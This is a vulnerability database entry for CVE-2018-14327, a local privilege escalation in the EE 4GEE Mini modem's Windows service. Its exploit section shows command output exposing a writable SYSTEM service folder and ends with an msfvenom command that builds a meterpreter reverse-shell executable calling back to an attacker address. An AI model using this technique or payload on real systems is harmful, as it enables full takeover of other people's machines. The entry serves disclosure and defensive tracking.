Details of VAR-E-201809-0081

ID

VAR-E-201809-0081

CVE

cve_id:

CVE-2018-14327

Trust: 1.8

sources: BID: 105385 // PACKETSTORM: 149492 // EXPLOIT-DB: 45501

EDB ID

45501

TITLE

EE 4GEE Mini EE40_00_02.00_44 - Privilege Escalation - Windows local Exploit

Trust: 0.6

sources: EXPLOIT-DB: 45501

DESCRIPTION

EE 4GEE Mini EE40_00_02.00_44 - Privilege Escalation. CVE-2018-14327 . local exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 45501

AFFECTED PRODUCTS

vendor:	ee	model:	4gee mini ee40 00 02.00 44	scope:	-	version:	-	Trust: 1.6
vendor:	ee	model:	4gee mini	scope:	-	version:	-	Trust: 0.5
vendor:	ee	model:	4gee wifi mini	scope:	eq	version:	0	Trust: 0.3
vendor:	ee	model:	4gee wifi mini ee40 00 02.00 45	scope:	ne	version:	-	Trust: 0.3

sources: BID: 105385 // PACKETSTORM: 149492 // EXPLOIT-DB: 45501 // EDBNET: 99505

EXPLOIT

# Title: EE 4GEE Mini EE40_00_02.00_44 - Privilege Escalation
# Date: 2018-09-22
# Software Version: EE40_00_02.00_44
# Tested on: Windows 10 64-bit and Windows 7 64-bit
# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)
# Original Advisory: http://blog.zerodaylab.com/2018/09/zerodaylab-discovers-ee-unquoted.html
# Original Write-up: https://osandamalith.com/2018/09/17/ee-4gee-mini-local-privilege-escalation-vulnerability-cve-2018-14327/
# CVE: CVE-2018-14327
# References
# https://www.theregister.co.uk/2018/09/19/ee_modem_vuln/
# https://thehackernews.com/2018/09/4g-ee-wifi-modem-hack.html

# PoC

C:\>sc qc "Alcatel OSPREY3_MINI Modem Device Helper"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Alcatel OSPREY3_MINI Modem Device Helper
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Web Connecton\EE40\BackgroundService\ServiceManager.exe -start
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Alcatel OSPREY3_MINI Modem Device Helper
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

# Weak Folder Permissions

C:\Program Files (x86)\Web Connecton>icacls EE40
EE40 Everyone:(OI)(CI)(F)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)

Successfully processed 1 files; Failed processing 0 files

C:\Program Files (x86)\Web Connecton>
C:\Program Files (x86)\Web Connecton>
C:\Program Files (x86)\Web Connecton>icacls EE40\BackgroundService
EE40\BackgroundService Everyone:(OI)(CI)(F)
Everyone:(I)(OI)(CI)(F)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)

Successfully processed 1 files; Failed processing 0 files

# Example Payload

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.4 lport=443 -f exe -o rev_shell.exe

Trust: 1.0

sources: EXPLOIT-DB: 45501

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 45501

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 45501

TYPE

Privilege Escalation

Trust: 1.6

sources: EXPLOIT-DB: 45501 // EDBNET: 99505

CREDITS

Osanda Malith Jayathissa

Trust: 0.6

sources: EXPLOIT-DB: 45501

EXTERNAL IDS

db:	NVD	id:	CVE-2018-14327	Trust: 3.0
db:	EXPLOIT-DB	id:	45501	Trust: 1.6
db:	EDBNET	id:	99505	Trust: 0.6
db:	0DAYTODAY	id:	31166	Trust: 0.6
db:	EDBNET	id:	99437	Trust: 0.6
db:	PACKETSTORM	id:	149492	Trust: 0.5
db:	BID	id:	105385	Trust: 0.3

sources: BID: 105385 // PACKETSTORM: 149492 // EXPLOIT-DB: 45501 // EDBNET: 99505 // EDBNET: 99437

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2018-14327	Trust: 1.5
url:	https://www.exploit-db.com/exploits/45501/	Trust: 0.6
url:	https://0day.today/exploits/31166	Trust: 0.6
url:	http://blog.zerodaylab.com/2018/09/zerodaylab-discovers-ee-unquoted.html	Trust: 0.3
url:	https://ee.co.uk/help/phones-and-device/ee/4gee-wifi	Trust: 0.3
url:	https://osandamalith.com/2018/09/17/ee-4gee-mini-local-privilege-escalation-vulnerability-cve-2018-14327/	Trust: 0.3

sources: BID: 105385 // PACKETSTORM: 149492 // EXPLOIT-DB: 45501 // EDBNET: 99505 // EDBNET: 99437

SOURCES

db:	BID	id:	105385
db:	PACKETSTORM	id:	149492
db:	EXPLOIT-DB	id:	45501
db:	EDBNET	id:	99505
db:	EDBNET	id:	99437

LAST UPDATE DATE

2022-07-27T09:26:55.958000+00:00

SOURCES UPDATE DATE

db:

BID

id:

105385

date:

2018-09-17T00:00:00

SOURCES RELEASE DATE

db:	BID	id:	105385	date:	2018-09-17T00:00:00
db:	PACKETSTORM	id:	149492	date:	2018-09-25T00:00:01
db:	EXPLOIT-DB	id:	45501	date:	2018-09-27T00:00:00
db:	EDBNET	id:	99505	date:	2018-09-27T00:00:00
db:	EDBNET	id:	99437	date:	2018-09-25T00:00:00

ID

CVE

EDB ID

TITLE

DESCRIPTION

AFFECTED PRODUCTS

EXPLOIT

EXPLOIT LANGUAGE

PRICE

TYPE

TAGS

CREDITS

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

SOURCES UPDATE DATE

SOURCES RELEASE DATE